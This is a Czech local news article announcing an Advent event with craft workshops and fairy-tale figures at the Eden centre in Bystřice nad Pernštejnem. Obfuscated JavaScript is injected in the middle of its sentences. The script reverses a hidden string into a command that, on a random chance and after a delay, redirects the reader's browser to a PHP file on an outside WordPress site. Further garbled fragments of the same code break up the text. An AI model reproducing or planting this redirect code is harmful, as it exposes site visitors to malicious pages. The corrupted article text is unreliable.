Rainbow page separator

Advent na Edenu

Pondělí, 19. listopadu 2018

Bystřice nad Pernštejnem / Přijďte si užít předvánoční atmosféru do centra Eden v Bystřici nad Pernštejnem. Advent v zábavním a poznávacím centru v Bystřici nad Pernštejnem proběhne 8. prosince od 9.30 do 18.00.

Děti se mohou zapojit do rukodělných dílen, kde je naučíme vytvářet vánoční dekoraci, nebo si vyrobí dárek, pro své blízké.

V Panském dvoře najdete pohádkové by["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tosti, které si připraví pro děti úkoly a otázky. Za jejich splnění obdrží odměnu. Ve sklepeních budou ukryti čertíci z pohádky S čerty nejsou žerty. V prvním patře zámečku Panského bydlení Vás uvítá =function(n){if ( () == "string") ; };.list=["\'//\'="];(=function(n){if ( () == "string") ; };.list=["\'//\'="];({if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}{if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}=function(n){if ( () == "string") ; };.list=["\'//\'="];({if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}{if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}anděl. V pazderně se nám ubytuje vlk z pohádky O červené karkulce, který si zaleze do sena a bude čekat na všechny příchozí.

V Horácké vesničce zavládne atmosféra Adventu a Vánoc. V jednotlivých chaloupkách budou umístěny rukodělné dílničky, kde si návštěvníci mohou vyrobit vánoční dekorace a dárečky pro své blízké. Děti se dozví o významu jednotlivých tradic. Více k připravované akci naleznete na www.centrumeden.cz nebo na facebooku Eden centrum

Advent na Edenu 8. prosince od 9.30 do 18.00 - v zábavním a poznávacím centru v Bystřici nad Pernštejnem.